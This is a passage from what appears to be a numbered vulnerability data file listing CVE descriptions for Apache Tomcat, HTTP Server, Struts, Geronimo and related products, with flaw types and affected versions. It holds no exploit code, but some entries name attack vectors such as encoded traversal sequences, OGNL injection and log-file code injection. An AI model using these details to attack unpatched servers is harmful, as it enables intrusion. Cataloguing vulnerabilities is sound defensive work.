4962| [CVE-2009-0918] Multiple unspecified vulnerabilities in DFLabs PTK 1.0.0 through 1.0.4 allow remote attackers to execute arbitrary commands in processes launched by PTK's Apache HTTP Server via (1) "external tools" or (2) a crafted forensic image.
4963| [CVE-2009-0796] Cross-site scripting (XSS) vulnerability in Status.pm in Apache::Status and Apache2::Status in mod_perl1 and mod_perl2 for the Apache HTTP Server, when /perl-status is accessible, allows remote attackers to inject arbitrary web script or HTML via the URI.
4964| [CVE-2009-0783] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application.
4965| [CVE-2009-0781] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML."
4966| [CVE-2009-0754] PHP 4.4.4, 5.1.6, and other versions, when running on Apache, allows local users to modify behavior of other sites hosted on the same web server by modifying the mbstring.func_overload setting within .htaccess, which causes this setting to be applied to other virtual hosts on the same server.
4967| [CVE-2009-0580] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when FORM authentication is used, allows remote attackers to enumerate valid usernames via requests to /j_security_check with malformed URL encoding of passwords, related to improper error checking in the (1) MemoryRealm, (2) DataSourceRealm, and (3) JDBCRealm authentication realms, as demonstrated by a % (percent) value for the j_password parameter.
4968| [CVE-2009-0486] Bugzilla 3.2.1, 3.0.7, and 3.3.2, when running under mod_perl, calls the srand function at startup time, which causes Apache children to have the same seed and produce insufficiently random numbers for random tokens, which allows remote attackers to bypass cross-site request forgery (CSRF) protection mechanisms and conduct unauthorized activities as other users.
4969| [CVE-2009-0039] Multiple cross-site request forgery (CSRF) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to hijack the authentication of administrators for requests that (1) change the web administration password, (2) upload applications, and perform unspecified other administrative actions, as demonstrated by (3) a Shutdown request to console/portal//Server/Shutdown.
4970| [CVE-2009-0038] Multiple cross-site scripting (XSS) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) ip, (3) username, or (4) description parameter to console/portal/Server/Monitoring
4971| [CVE-2009-0033] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when the Java AJP connector and mod_jk load balancing are used, allows remote attackers to cause a denial of service (application outage) via a crafted request with invalid headers, related to temporary blocking of connectors that have encountered errors, as demonstrated by an error involving a malformed HTTP Host header.
4972| [CVE-2009-0026] Multiple cross-site scripting (XSS) vulnerabilities in Apache Jackrabbit before 1.5.2 allow remote attackers to inject arbitrary web script or HTML via the q parameter to (1) search.jsp or (2) swr.jsp.
4973| [CVE-2009-0023] The apr_strmatch_precompile function in strmatch/apr_strmatch.c in Apache APR-util before 1.3.5 allows remote attackers to cause a denial of service (daemon crash) via crafted input involving (1) a .htaccess file used with the Apache HTTP Server, (2) the SVNMasterURI directive in the mod_dav_svn module in the Apache HTTP Server, (3) the mod_apreq2 module for the Apache HTTP Server, or (4) an application that uses the libapreq2 library, which triggers a heap-based buffer underflow.
4974| [CVE-2008-6879] Cross-site scripting (XSS) vulnerability in Apache Roller 2.3, 3.0, 3.1, and 4.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action.
4975| [CVE-2008-6755] ZoneMinder 1.23.3 on Fedora 10 sets the ownership of /etc/zm.conf to the apache user account, and sets the permissions to 0600, which makes it easier for remote attackers to modify this file by accessing it through a (1) PHP or (2) CGI script.
4976| [CVE-2008-6722] Novell Access Manager 3 SP4 does not properly expire X.509 certificate sessions, which allows physically proximate attackers to obtain a logged-in session by using a victim's web-browser process that continues to send the original and valid SSL sessionID, related to inability of Apache Tomcat to clear entries from its SSL cache.
4977| [CVE-2008-6682] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.x before 2.0.11.1 and 2.1.x before 2.1.1 allow remote attackers to inject arbitrary web script or HTML via vectors associated with improper handling of (1) " (double quote) characters in the href attribute of an s:a tag and (2) parameters in the action attribute of an s:url tag.
4978| [CVE-2008-6505] Multiple directory traversal vulnerabilities in Apache Struts 2.0.x before 2.0.12 and 2.1.x before 2.1.3 allow remote attackers to read arbitrary files via a ..%252f (encoded dot dot slash) in a URI with a /struts/ path, related to (1) FilterDispatcher in 2.0.x and (2) DefaultStaticContentLoader in 2.1.x.
4979| [CVE-2008-6504] ParametersInterceptor in OpenSymphony XWork 2.0.x before 2.0.6 and 2.1.x before 2.1.2, as used in Apache Struts and other products, does not properly restrict # (pound sign) references to context objects, which allows remote attackers to execute Object-Graph Navigation Language (OGNL) statements and modify server-side context objects, as demonstrated by use of a \u0023 representation for the # character.
4980| [CVE-2008-5696] Novell NetWare 6.5 before Support Pack 8, when an OES2 Linux server is installed into the NDS tree, does not require a password for the ApacheAdmin console, which allows remote attackers to reconfigure the Apache HTTP Server via console operations.
4981| [CVE-2008-5676] Multiple unspecified vulnerabilities in the ModSecurity (aka mod_security) module 2.5.0 through 2.5.5 for the Apache HTTP Server, when SecCacheTransformations is enabled, allow remote attackers to cause a denial of service (daemon crash) or bypass the product's functionality via unknown vectors related to "transformation caching."
4982| [CVE-2008-5519] The JK Connector (aka mod_jk) 1.2.0 through 1.2.26 in Apache Tomcat allows remote attackers to obtain sensitive information via an arbitrary request from an HTTP client, in opportunistic circumstances involving (1) a request from a different client that included a Content-Length header but no POST data or (2) a rapid series of requests, related to noncompliance with the AJP protocol's requirements for requests containing Content-Length headers.
4983| [CVE-2008-5518] Multiple directory traversal vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 on Windows allow remote attackers to upload files to arbitrary directories via directory traversal sequences in the (1) group, (2) artifact, (3) version, or (4) fileType parameter to console/portal//Services/Repository (aka the Services/Repository portlet)
4984| [CVE-2008-5515] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, 6.0.0 through 6.0.18, and possibly earlier versions normalizes the target pathname before filtering the query string when using the RequestDispatcher method, which allows remote attackers to bypass intended access restrictions and conduct directory traversal attacks via .. (dot dot) sequences and the WEB-INF directory in a Request.
4985| [CVE-2008-5457] Unspecified vulnerability in the Oracle BEA WebLogic Server Plugins for Apache, Sun and IIS web servers component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
4986| [CVE-2008-4308] The doRead method in Apache Tomcat 4.1.32 through 4.1.34 and 5.5.10 through 5.5.20 does not return a -1 to indicate when a certain error condition has occurred, which can cause Tomcat to send POST content from one request to a different request.
4987| [CVE-2008-4008] Unspecified vulnerability in the WebLogic Server Plugins for Apache component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2008 CPU. Oracle has not commented on reliable researcher claims that this issue is a stack-based buffer overflow in the WebLogic Apache Connector, related to an invalid parameter.
4988| [CVE-2008-3666] Unspecified vulnerability in Sun Solaris 10 and OpenSolaris before snv_96 allows (1) context-dependent attackers to cause a denial of service (panic) via vectors involving creation of a crafted file and use of the sendfilev system call, as demonstrated by a file served by an Apache 2.2.x web server with EnableSendFile configured
4989| [CVE-2008-3271] Apache Tomcat 5.5.0 and 4.1.0 through 4.1.31 allows remote attackers to bypass an IP address restriction and obtain sensitive information via a request that is processed concurrently with another request but in a different thread, leading to an instance-variable overwrite associated with a "synchronization problem" and lack of thread safety, and related to RemoteFilterValve, RemoteAddrValve, and RemoteHostValve.
4990| [CVE-2008-3257] Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after "POST /.jsp" in an HTTP request.
4991| [CVE-2008-2939] Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apache 2.0.63 and earlier, and mod_proxy_ftp.c in the mod_proxy_ftp module in Apache 2.2.9 and earlier 2.2 versions, allows remote attackers to inject arbitrary web script or HTML via a wildcard in the last directory component in the pathname in an FTP URI.
4992| [CVE-2008-2938] Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.
4993| [CVE-2008-2742] Unrestricted file upload in the mcpuk file editor (atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/config.php) in Achievo 1.2.0 through 1.3.2 allows remote attackers to execute arbitrary code by uploading a file with .php followed by a safe extension, then accessing it via a direct request to the file in the Achievo root directory. NOTE: this is only a vulnerability in environments that support multiple extensions, such as Apache with the mod_mime module enabled.
4994| [CVE-2008-2717] TYPO3 4.0.x before 4.0.9, 4.1.x before 4.1.7, and 4.2.x before 4.2.1, uses an insufficiently restrictive default fileDenyPattern for Apache, which allows remote attackers bypass security restrictions and upload configuration files such as .htaccess, or conduct file upload attacks using multiple extensions.
4995| [CVE-2008-2579] Unspecified vulnerability in the WebLogic Server Plugins for Apache, Sun and IIS web servers component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 has unknown impact and remote attack vectors.
4996| [CVE-2008-2384] SQL injection vulnerability in mod_auth_mysql.c in the mod-auth-mysql (aka libapache2-mod-auth-mysql) module for the Apache HTTP Server 2.x, when configured to use a multibyte character set that allows a \ (backslash) as part of the character encoding, allows remote attackers to execute arbitrary SQL commands via unspecified inputs in a login request.
4997| [CVE-2008-2370] Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when a RequestDispatcher is used, performs path normalization before removing the query string from the URI, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a .. (dot dot) in a request parameter.
4998| [CVE-2008-2364] The ap_proxy_http_process_response function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server 2.0.63 and 2.2.8 does not limit the number of forwarded interim responses, which allows remote HTTP servers to cause a denial of service (memory consumption) via a large number of interim responses.
4999| [CVE-2008-2168] Cross-site scripting (XSS) vulnerability in Apache 2.2.6 and earlier allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded URLs that are not properly handled when displaying the 403 Forbidden error page.
5000| [CVE-2008-2025] Cross-site scripting (XSS) vulnerability in Apache Struts before 1.2.9-162.31.1 on SUSE Linux Enterprise (SLE) 11, before 1.2.9-108.2 on SUSE openSUSE 10.3, before 1.2.9-198.2 on SUSE openSUSE 11.0, and before 1.2.9-162.163.2 on SUSE openSUSE 11.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "insufficient quoting of parameters."
5001| [CVE-2008-1947] Cross-site scripting (XSS) vulnerability in Apache Tomcat 5.5.9 through 5.5.26 and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via the name parameter (aka the hostname attribute) to host-manager/html/add.
5002| [CVE-2008-1734] Interpretation conflict in PHP Toolkit before 1.0.1 on Gentoo Linux might allow local users to cause a denial of service (PHP outage) and read contents of PHP scripts by creating a file with a one-letter lowercase alphabetic name, which triggers interpretation of a certain unquoted [a-z] argument as a matching shell glob for this name, rather than interpretation as the literal [a-z] regular-expression string, and consequently blocks the launch of the PHP interpreter within the Apache HTTP Server.
5003| [CVE-2008-1678] Memory leak in the zlib_stateful_init function in crypto/comp/c_zlib.c in libssl in OpenSSL 0.9.8f through 0.9.8h allows remote attackers to cause a denial of service (memory consumption) via multiple calls, as demonstrated by initial SSL client handshakes to the Apache HTTP Server mod_ssl that specify a compression algorithm.
5004| [CVE-2008-1232] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via a crafted string that is used in the message argument to the HttpServletResponse.sendError method.
5005| [CVE-2008-0869] Cross-site scripting (XSS) vulnerability in BEA WebLogic Workshop 8.1 through SP6 and Workshop for WebLogic 9.0 through 10.0 allows remote attackers to inject arbitrary web script or HTML via a "framework defined request parameter" when using WebLogic Workshop or Apache Beehive NetUI framework with page flows.
5006| [CVE-2008-0732] The init script for Apache Geronimo on SUSE Linux follows symlinks when performing a chown operation, which might allow local users to obtain access to unspecified files or directories.
5007| [CVE-2008-0555] The ExpandCert function in Apache-SSL before apache_1.3.41+ssl_1.59 does not properly handle (1) '/' and (2) '=' characters in a Distinguished Name (DN) in a client certificate, which might allow remote attackers to bypass authentication via a crafted DN that triggers overwriting of environment variables.
5008| [CVE-2008-0457] Unrestricted file upload vulnerability in the FileUpload class running on the Symantec LiveState Apache Tomcat server, as used by Symantec Backup Exec System Recovery Manager 7.0 and 7.0.1, allows remote attackers to upload and execute arbitrary JSP files via unknown vectors.
5009| [CVE-2008-0456] CRLF injection vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary HTTP headers and conduct HTTP response splitting attacks by uploading a file with a multi-line name containing HTTP header sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
5010| [CVE-2008-0455] Cross-site scripting (XSS) vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary web script or HTML by uploading a file with a name containing XSS sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
5011| [CVE-2008-0128] The SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) in Apache Tomcat before 5.5.21 does not set the secure flag for the JSESSIONIDSSO cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.
5012| [CVE-2008-0005] mod_proxy_ftp in Apache 2.2.x before 2.2.7-dev, 2.0.x before 2.0.62-dev, and 1.3.x before 1.3.40-dev does not define a charset, which allows remote attackers to conduct cross-site scripting (XSS) attacks using UTF-7 encoding.
5013| [CVE-2008-0002] Apache Tomcat 6.0.0 through 6.0.15 processes parameters in the context of the wrong request when an exception occurs during parameter processing, which might allow remote attackers to obtain sensitive information, as demonstrated by disconnecting during this processing in order to trigger the exception.
5014| [CVE-2007-6750] The Apache HTTP Server 1.x and 2.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris, related to the lack of the mod_reqtimeout module in versions before 2.2.15.
5015| [CVE-2007-6726] Multiple cross-site scripting (XSS) vulnerabilities in Dojo 0.4.1 and 0.4.2, as used in Apache Struts and other products, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving (1) xip_client.html and (2) xip_server.html in src/io/.
5016| [CVE-2007-6514] Apache HTTP Server, when running on Linux with a document root on a Windows share mounted using smbfs, allows remote attackers to obtain unprocessed content such as source files for .php programs via a trailing "\" (backslash), which is not handled by the intended AddType directive.
5017| [CVE-2007-6423] ** DISPUTED ** Unspecified vulnerability in mod_proxy_balancer for Apache HTTP Server 2.2.x before 2.2.7-dev, when running on Windows, allows remote attackers to trigger memory corruption via a long URL. NOTE: the vendor could not reproduce this issue.
5018| [CVE-2007-6422] The balancer_handler function in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6, when a threaded Multi-Processing Module is used, allows remote authenticated users to cause a denial of service (child process crash) via an invalid bb variable.
5019| [CVE-2007-6421] Cross-site scripting (XSS) vulnerability in balancer-manager in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via the (1) ss, (2) wr, or (3) rr parameters, or (4) the URL.
5020| [CVE-2007-6420] Cross-site request forgery (CSRF) vulnerability in the balancer-manager in mod_proxy_balancer for Apache HTTP Server 2.2.x allows remote attackers to gain privileges via unspecified vectors.
5021| [CVE-2007-6388] Cross-site scripting (XSS) vulnerability in mod_status in the Apache HTTP Server 2.2.0 through 2.2.6, 2.0.35 through 2.0.61, and 1.3.2 through 1.3.39, when the server-status page is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
5022| [CVE-2007-6361] Gekko 0.8.2 and earlier stores sensitive information under the web root with possibly insufficient access control, which might allow remote attackers to read certain files under temp/, as demonstrated by a log file that records the titles of blog entries. NOTE: access to temp/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
5023| [CVE-2007-6342] SQL injection vulnerability in the David Castro AuthCAS module (AuthCAS.pm) 0.4 for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the SESSION_COOKIE_NAME (session ID) in a cookie.
5024| [CVE-2007-6286] Apache Tomcat 5.5.11 through 5.5.25 and 6.0.0 through 6.0.15, when the native APR connector is used, does not properly handle an empty request to the SSL port, which allows remote attackers to trigger handling of "a duplicate copy of one of the recent requests," as demonstrated by using netcat to send the empty request.
5025| [CVE-2007-6258] Multiple stack-based buffer overflows in the legacy mod_jk2 2.0.3-DEV and earlier Apache module allow remote attackers to execute arbitrary code via a long (1) Host header, or (2) Hostname within a Host header.
5026| [CVE-2007-6231] Multiple PHP remote file inclusion vulnerabilities in tellmatic 1.0.7 allow remote attackers to execute arbitrary PHP code via a URL in the tm_includepath parameter to (1) Classes.inc.php, (2) statistic.inc.php, (3) status.inc.php, (4) status_top_x.inc.php, or (5) libchart-1.1/libchart.php in include/. NOTE: access to include/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
5027| [CVE-2007-6203] Apache HTTP Server 2.0.x and 2.2.x does not sanitize the HTTP Method specifier header from an HTTP request when it is reflected back in a "413 Request Entity Too Large" error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated via an HTTP request containing an invalid Content-length value, a similar issue to CVE-2006-3918.
5028| [CVE-2007-5797] SQLLoginModule in Apache Geronimo 2.0 through 2.1 does not throw an exception for a nonexistent username, which allows remote attackers to bypass authentication via a login attempt with any username not contained in the database.
5029| [CVE-2007-5731] Absolute path traversal vulnerability in Apache Jakarta Slide 2.1 and earlier allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag, a related issue to CVE-2007-5461.
5030| [CVE-2007-5461] Absolute path traversal vulnerability in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0, 5.0.0, 5.5.0 through 5.5.25, and 6.0.0 through 6.0.14, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag.
5031| [CVE-2007-5342] The default catalina.policy in the JULI logging component in Apache Tomcat 5.5.9 through 5.5.25 and 6.0.0 through 6.0.15 does not restrict certain permissions for web applications, which allows attackers to modify logging configuration options and overwrite arbitrary files, as demonstrated by changing the (1) level, (2) directory, and (3) prefix attributes in the org.apache.juli.FileHandler handler.
5032| [CVE-2007-5333] Apache Tomcat 6.0.0 through 6.0.14, 5.5.0 through 5.5.25, and 4.1.0 through 4.1.36 does not properly handle (1) double quote (") characters or (2) %5C (encoded backslash) sequences in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks. NOTE: this issue exists because of an incomplete fix for CVE-2007-3385.
5033| [CVE-2007-5156] Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload.php in FCKeditor, as used in SiteX CMS 0.7.3.beta, La-Nai CMS, Syntax CMS, Cardinal Cms, and probably other products, allows remote attackers to upload and execute arbitrary PHP code via a file whose name contains ".php." and has an unknown extension, which is recognized as a .php file by the Apache HTTP server, a different vulnerability than CVE-2006-0658 and CVE-2006-2529.
5034| [CVE-2007-5085] Unspecified vulnerability in the management EJB (MEJB) in Apache Geronimo before 2.0.2 allows remote attackers to bypass authentication and obtain "access to Geronimo internals" via unspecified vectors.
5035| [CVE-2007-5000] Cross-site scripting (XSS) vulnerability in the (1) mod_imap module in the Apache HTTP Server 1.3.0 through 1.3.39 and 2.0.35 through 2.0.61 and the (2) mod_imagemap module in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
5036| [CVE-2007-4724] Cross-site request forgery (CSRF) vulnerability in cal2.jsp in the calendar examples application in Apache Tomcat 4.1.31 allows remote attackers to add events as arbitrary users via the time and description parameters.
5037| [CVE-2007-4723] Directory traversal vulnerability in Ragnarok Online Control Panel 4.3.4a, when the Apache HTTP Server is used, allows remote attackers to bypass authentication via directory traversal sequences in a URI that ends with the name of a publicly available page, as demonstrated by a "/...../" sequence and an account_manage.php/login.php final component for reaching the protected account_manage.php page.
5038| [CVE-2007-4641] Directory traversal vulnerability in index.php in Pakupaku CMS 0.4 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting code into an Apache log file.
5039| [CVE-2007-4556] Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character.
5040| [CVE-2007-4548] The login method in LoginModule implementations in Apache Geronimo 2.0 does not throw FailedLoginException for failed logins, which allows remote attackers to bypass authentication requirements, deploy arbitrary modules, and gain administrative access by sending a blank username and password with the command line deployer in the deployment module.
5041| [CVE-2007-4465] Cross-site scripting (XSS) vulnerability in mod_autoindex.c in the Apache HTTP Server before 2.2.6, when the charset on a server-generated page is not defined, allows remote attackers to inject arbitrary web script or HTML via the P parameter using the UTF-7 charset. NOTE: it could be argued that this issue is due to a design limitation of browsers that attempt to perform automatic content type detection.
5042| [CVE-2007-3847] The date handling code in modules/proxy/proxy_util.c (mod_proxy) in Apache 2.3.0, when using a threaded MPM, allows remote origin servers to cause a denial of service (caching forward proxy process crash) via crafted date headers that trigger a buffer over-read.
5043| [CVE-2007-3571] The Apache Web Server as used in Novell NetWare 6.5 and GroupWise allows remote attackers to obtain sensitive information via a certain directive to Apache that causes the HTTP-Header response to be modified, which may reveal the server's internal IP address.
5044| [CVE-2007-3386] Cross-site scripting (XSS) vulnerability in the Host Manager Servlet for Apache Tomcat 6.0.0 to 6.0.13 and 5.5.0 to 5.5.24 allows remote attackers to inject arbitrary HTML and web script via crafted requests, as demonstrated using the aliases parameter to an html/add action.
5045| [CVE-2007-3385] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 does not properly handle the \" character sequence in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks.
5046| [CVE-2007-3384] Multiple cross-site scripting (XSS) vulnerabilities in examples/servlet/CookieExample in Apache Tomcat 3.3 through 3.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Value field, related to error messages.
5047| [CVE-2007-3383] Cross-site scripting (XSS) vulnerability in SendMailServlet in the examples web application (examples/jsp/mail/sendmail.jsp) in Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.36 allows remote attackers to inject arbitrary web script or HTML via the From field and possibly other fields, related to generation of error messages.
5048| [CVE-2007-3382] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 treats single quotes ("'") as delimiters in cookies, which might cause sensitive information such as session IDs to be leaked and allow remote attackers to conduct session hijacking attacks.
5049| [CVE-2007-3304] Apache httpd 1.3.37, 2.0.59, and 2.2.4 with the Prefork MPM module, allows local users to cause a denial of service by modifying the worker_score and process_score arrays to reference an arbitrary process ID, which is sent a SIGUSR1 signal from the master process, aka "SIGUSR1 killer."
5050| [CVE-2007-3303] Apache httpd 2.0.59 and 2.2.4, with the Prefork MPM module, allows local users to cause a denial of service via certain code sequences executed in a worker process that (1) stop request processing by killing all worker processes and preventing creation of replacements or (2) hang the system by forcing the master process to fork an arbitrarily large number of worker processes. NOTE: This might be an inherent design limitation of Apache with respect to worker processes in hosted environments.
5051| [CVE-2007-3101] Multiple cross-site scripting (XSS) vulnerabilities in certain JSF applications in Apache MyFaces Tomahawk before 1.1.6 allow remote attackers to inject arbitrary web script via the autoscroll parameter, which is injected into Javascript that is sent to the client.
5052| [CVE-2007-2450] Multiple cross-site scripting (XSS) vulnerabilities in the (1) Manager and (2) Host Manager web applications in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote authenticated users to inject arbitrary web script or HTML via a parameter name to manager/html/upload, and other unspecified vectors.
5053| [CVE-2007-2449] Multiple cross-site scripting (XSS) vulnerabilities in certain JSP files in the examples web application in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote attackers to inject arbitrary web script or HTML via the portion of the URI after the '
5054| [CVE-2007-2353] Apache Axis 1.0 allows remote attackers to obtain sensitive information by requesting a non-existent WSDL file, which reveals the installation path in the resulting exception message.
5055| [CVE-2007-2025] Unrestricted file upload vulnerability in the UpLoad feature (lib/plugin/UpLoad.php) in PhpWiki 1.3.11p1 allows remote attackers to upload arbitrary PHP files with a double extension, as demonstrated by .php.3, which is interpreted by Apache as being a valid PHP file.
5056| [CVE-2007-1863] cache_util.c in the mod_cache module in Apache HTTP Server (httpd), when caching is enabled and a threaded Multi-Processing Module (MPM) is used, allows remote attackers to cause a denial of service (child processing handler crash) via a request with the (1) s-maxage, (2) max-age, (3) min-fresh, or (4) max-stale Cache-Control headers without a value.
5057| [CVE-2007-1862] The recall_headers function in mod_mem_cache in Apache 2.2.4 does not properly copy all levels of header data, which can cause Apache to return HTTP headers containing previously used data, which could be used by remote attackers to obtain potentially sensitive information.
5058| [CVE-2007-1860] mod_jk in Apache Tomcat JK Web Server Connector 1.2.x before 1.2.23 decodes request URLs within the Apache HTTP Server before passing the URL to Tomcat, which allows remote attackers to access protected pages via a crafted prefix JkMount, possibly involving double-encoded .. (dot dot) sequences and directory traversal, a related issue to CVE-2007-0450.
5059| [CVE-2007-1858] The default SSL cipher configuration in Apache Tomcat 4.1.28 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.17 uses certain insecure ciphers, including the anonymous cipher, which allows remote attackers to obtain sensitive information or have other, unspecified impacts.
5060| [CVE-2007-1842] Directory traversal vulnerability in login.php in JSBoard before 2.0.12 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the table parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, a related issue to CVE-2006-2019.
5061| [CVE-2007-1801] Directory traversal vulnerability in inc/lang.php in sBLOG 0.7.3 Beta allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the conf_lang_default parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by inc/lang.php.
5062| [CVE-2007-1743] suexec in Apache HTTP Server (httpd) 2.2.3 does not verify combinations of user and group IDs on the command line, which might allow local users to leverage other vulnerabilities to create arbitrary UID/GID owned files if /proc is mounted. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root." In addition, because this is dependent on other vulnerabilities, perhaps this is resultant and should not be included in CVE.
5063| [CVE-2007-1742] suexec in Apache HTTP Server (httpd) 2.2.3 uses a partial comparison for verifying whether the current directory is within the document root, which might allow local users to perform unauthorized operations on incorrect directories, as demonstrated using "html_backup" and "htmleditor" under an "html" directory. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
5064| [CVE-2007-1741] Multiple race conditions in suexec in Apache HTTP Server (httpd) 2.2.3 between directory and file validation, and their usage, allow local users to gain privileges and execute arbitrary code by renaming directories or performing symlink attacks. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
5065| [CVE-2007-1720] Directory traversal vulnerability in addressbook.php in the Addressbook 1.2 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the module_name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file.
5066| [CVE-2007-1636] Directory traversal vulnerability in index.php in RoseOnlineCMS 3 B1 allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the op parameter, as demonstrated by injecting PHP code into Apache log files via the URL and User-Agent HTTP header.
5067| [CVE-2007-1633] Directory traversal vulnerability in bbcode_ref.php in the Giorgio Ciranni Splatt Forum 4.0 RC1 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by bbcode_ref.php.
